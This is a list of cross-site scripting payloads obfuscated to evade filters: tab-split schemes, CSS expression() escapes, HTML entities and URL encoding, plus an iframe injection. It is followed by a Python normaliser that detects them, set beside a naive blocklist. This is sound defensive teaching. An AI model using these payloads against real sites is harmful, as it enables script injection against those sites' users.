<script>alert("跨站")</script> (most commonly used)
<img src=javascript:alert("跨站")></img>
<img src="javascript: alert(/跨站/)"></img>
<img src="javas????cript:alert(/跨站/)" width=150></img> (the gap inside the scheme is produced with the Tab key)
<img src="#" onerror=alert(/跨站/)></img>
<img src="#" style="xss:expression(alert(/xss/));"></img>
<img src="#"/* */onerror=alert(/xss/) width=150></img> (/* */ is a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078pression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}"></div>
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
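The vectors above are all variations on four constructs (a script tag, a javascript:/vbscript: URI, an on* event handler, and IE's CSS expression()), each obfuscated so that a literal substring filter does not see it: a Tab inside the scheme, a /* */ comment, a CSS hex escape, an HTML entity, mixed case, or URL encoding. The following added example (not code from the original page) shows the defender's side: a normaliser that undoes those encodings before checking, run next to the naive blocklist the obfuscation is designed to beat. The sample fragments are constructed here from the list above; example.com and the sample names are placeholders.

```python
# Added example (not from the original page): normalise a few of the
# obfuscated vectors above and flag the constructs a server-side filter
# should reject, versus a naive substring blocklist that the obfuscation defeats.
import html
import re
from urllib.parse import unquote

CONTROL = re.compile(r"[\x00-\x1f\x7f]")             # tab/newline/NUL: browsers skip them inside a scheme
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?")   # CSS hex escape, e.g. \0065 -> 'e'
COMMENT = re.compile(r"/\*.*?\*/", re.S)              # /* */ inside CSS or between attributes
ATTR = re.compile(r"""([a-zA-Z_:][-\w:.]*)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
SCRIPT_SCHEMES = ("javascript:", "vbscript:")
NAIVE_BLOCKLIST = ("<script", "javascript:", "onerror", "expression(")


def normalize(fragment: str) -> str:
    """Undo the encodings used above so that the checks see what the browser sees."""
    s = unquote(fragment)                                   # %3Cscript%3E -> <script>
    s = html.unescape(s)                                    # &#x0065; -> e
    s = CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)
    s = COMMENT.sub("", s)                                  # exp/* */ression -> expression
    s = CONTROL.sub("", s)                                  # javas<TAB>cript -> javascript
    return s.lower()                                        # expRessioN -> expression


def naive_blocklist(fragment: str) -> bool:
    """The kind of literal check the obfuscated vectors are written to slip past."""
    low = fragment.lower()
    return any(bad in low for bad in NAIVE_BLOCKLIST)


def find_indicators(fragment: str) -> list[str]:
    """Return the dangerous constructs found after normalisation (empty list = clean)."""
    s = normalize(fragment)
    found = set()
    if "<script" in s:
        found.add("script-tag")
    if re.search(r"expression\s*\(", s):                    # IE CSS expression()
        found.add("css-expression")
    for name, value in ATTR.findall(s):
        if name.startswith("on"):                           # any event handler attribute
            found.add("event-handler:" + name)
        v = re.sub(r"\s+", "", value.strip("\"'"))
        if v.startswith(SCRIPT_SCHEMES):
            found.add("script-uri:" + v.split(":", 1)[0])
    return sorted(found)


# Constructed samples, modelled on the list above (alert() demos only).
SAMPLES = {
    "tab-in-scheme": '<img src="javas\tcript:alert(/xss/)" width=150></img>',
    "comment-attr":  '<img src="#"/* */onerror=alert(/xss/) width=150></img>',
    "css-comment":   "<div style={left:exp/* */ression (alert('xss'))}></div>",
    "css-escape":    "<div style={left:\\0065\\0078pression (alert('xss'))}></div>",
    "html-entity":   "<div style={left:&#x0065;xpression (alert('xss'))}></div>",
    "url-encoded":   "%3Cscript%3Ealert('xss')%3C/script%3E",
    "plain-link":    '<a href="http://example.com/">ok</a>',   # benign control
}


def evaluate(samples: dict = SAMPLES) -> dict:
    """Map each sample to (caught by the naive blocklist?, indicators after normalisation)."""
    return {name: (naive_blocklist(frag), find_indicators(frag)) for name, frag in samples.items()}


if __name__ == "__main__":
    for name, (naive, hits) in evaluate().items():
        print(f"{name:14} naive={str(naive):5} normalised={hits}")
```

Only the /* */-between-attributes vector trips the naive blocklist (the literal "onerror" survives), while every other obfuscated sample passes it and is caught only after normalisation. Normalising before checking is the point; in practice the right fix is to stop rendering untrusted input as HTML at all (context-aware output encoding or a whitelist-based HTML sanitiser), and a check like this belongs in logging and detection rather than as the sole control, since the CSS-escape decoder is deliberately eager and will also touch legitimate backslash sequences.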